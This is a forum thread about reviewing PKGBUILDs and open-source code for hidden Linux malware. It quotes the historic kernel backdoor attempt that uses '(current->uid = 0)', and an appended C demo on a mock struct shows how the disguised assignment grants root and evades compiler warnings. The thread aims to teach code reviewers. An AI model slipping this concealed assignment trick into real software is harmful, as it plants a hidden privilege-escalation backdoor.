
Comment by jolmg

8 years ago

Is there a public database of linux malware found in the wild that one can study to know what kind of things to look for when reviewing PKGBUILDs and other open source code?

EDIT: s/repository/public database/

Nothing that I know of. Are you thinking specific to Arch Linux or in general?

  • In general, but also containing malware found in code belonging to the different distributions, like PKGBUILDs. I'm just thinking that part of the problem with the lack of review of AUR packages by the users is that it's not really obvious what one should be on the lookout for. What does Linux malware found in the wild generally look like? That's what I'm wondering. I would think that it would benefit us all to make the cases where malware is found easier to study.

    The case shown here is pretty obvious-looking, but I don't think it would be too difficult to make it better hidden. Seeing what kind of tricks are statistically more common would make PKGBUILDs easier to review.

    • This is one example of a kernel backdoor:

          if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
              retval = -EINVAL;
      

      If you haven't heard of it before, and if you're not an experienced dev, it can be tricky to spot. So what I'm trying to say is that I think you're right in that it's difficult for random people (even if they have a strong tech background) to do secure code reviews.

      More info on this particular one at e.g. https://freedom-to-tinker.com/2013/10/09/the-linux-backdoor-... or just search for 'linux backdoor attempt'

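The snippet above is hard to spot because `(current->uid = 0)` is an assignment, not a comparison: it evaluates to 0 so `retval` is never set, but the side effect runs whenever the options match, leaving the caller with uid 0 (root), and the extra parentheses silence the compiler's usual assignment-in-condition warning. The following is an added example (not code from the thread or from the kernel) that reproduces the effect on a constructed mock task struct, with the backdoored and the intended form side by side; `struct mock_task`, `MOCK_WCLONE`, `MOCK_WALL` and `MOCK_EINVAL` are stand-ins chosen here.

```c
#include <stdint.h>
#include <stdio.h>

/* Constructed stand-ins for the kernel's task struct and wait flags. */
#define MOCK_WCLONE 0x80000000u
#define MOCK_WALL   0x40000000u
#define MOCK_EINVAL 22

struct mock_task {
    uint32_t uid;   /* 0 means root, as in the real kernel */
};

/* Backdoored form: a single '=' turns the comparison into an assignment.
 * '(uid = 0)' always evaluates to 0, so retval is never set, but the
 * assignment itself runs whenever the options match, leaving uid == 0.
 * The surrounding parentheses suppress gcc/clang's -Wparentheses warning. */
static int wait_check_backdoored(struct mock_task *cur, unsigned int options)
{
    int retval = 0;
    if ((options == (MOCK_WCLONE | MOCK_WALL)) && (cur->uid = 0))
        retval = -MOCK_EINVAL;
    return retval;
}

/* Intended form: '==' compares and has no side effect on uid. */
static int wait_check_fixed(struct mock_task *cur, unsigned int options)
{
    int retval = 0;
    if ((options == (MOCK_WCLONE | MOCK_WALL)) && (cur->uid == 0))
        retval = -MOCK_EINVAL;
    return retval;
}

/* Runs one of the checks on a task with the given uid and returns the uid
 * afterwards, so the privilege change (or its absence) is observable. */
static uint32_t uid_after(int (*check)(struct mock_task *, unsigned int),
                          uint32_t start_uid, unsigned int options)
{
    struct mock_task t = { .uid = start_uid };
    check(&t, options);
    return t.uid;
}

int main(void)
{
    unsigned int magic = MOCK_WCLONE | MOCK_WALL;
    printf("backdoored: uid 1000 -> %u\n", uid_after(wait_check_backdoored, 1000, magic));
    printf("fixed:      uid 1000 -> %u\n", uid_after(wait_check_fixed, 1000, magic));
    return 0;
}
```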